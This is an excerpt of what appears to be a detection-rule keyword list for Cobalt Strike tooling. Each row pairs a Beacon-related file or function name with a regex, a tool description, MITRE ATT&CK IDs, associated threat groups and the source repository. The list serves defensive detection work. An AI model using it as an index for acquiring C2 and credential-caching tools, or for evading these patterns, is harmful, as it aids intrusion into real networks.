"*BeaconJobWriter.cs*",".{0,1000}BeaconJobWriter\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","35717"
"*beaconlogs.json*",".{0,1000}beaconlogs\.json.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","35718"
"*beaconlogtracker.py*",".{0,1000}beaconlogtracker\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","35719"
"*BeaconNote.cna*",".{0,1000}BeaconNote\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","N/A","10","10","150","35","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z","35720"
"*BeaconNotify.cna*",".{0,1000}BeaconNotify\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","N/A","10","10","150","35","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z","35721"
"*BeaconObject.cs*",".{0,1000}BeaconObject\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","35722"
"*BeaconOutputStreamW*",".{0,1000}BeaconOutputStreamW.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","35723"
"*BeaconOutputWriter.cs*",".{0,1000}BeaconOutputWriter\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","35724"
"*BeaconPrintf(*",".{0,1000}BeaconPrintf\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","N/A","10","10","85","11","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z","35725"
"*BeaconPrintf*",".{0,1000}BeaconPrintf.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35726"
"*BeaconPrintToStreamW*",".{0,1000}BeaconPrintToStreamW.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","35727"
"*BeaconSpawnTemporaryProcess*",".{0,1000}BeaconSpawnTemporaryProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","35728"
"*BeaconSpawnTemporaryProcess*",".{0,1000}BeaconSpawnTemporaryProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35729"
"*BeaconTool -*",".{0,1000}BeaconTool\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","35730"
"*BeaconTool -i online_info.txt -aes decrypt*",".{0,1000}BeaconTool\s\-i\sonline_info\.txt\s\-aes\sdecrypt.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","35731"
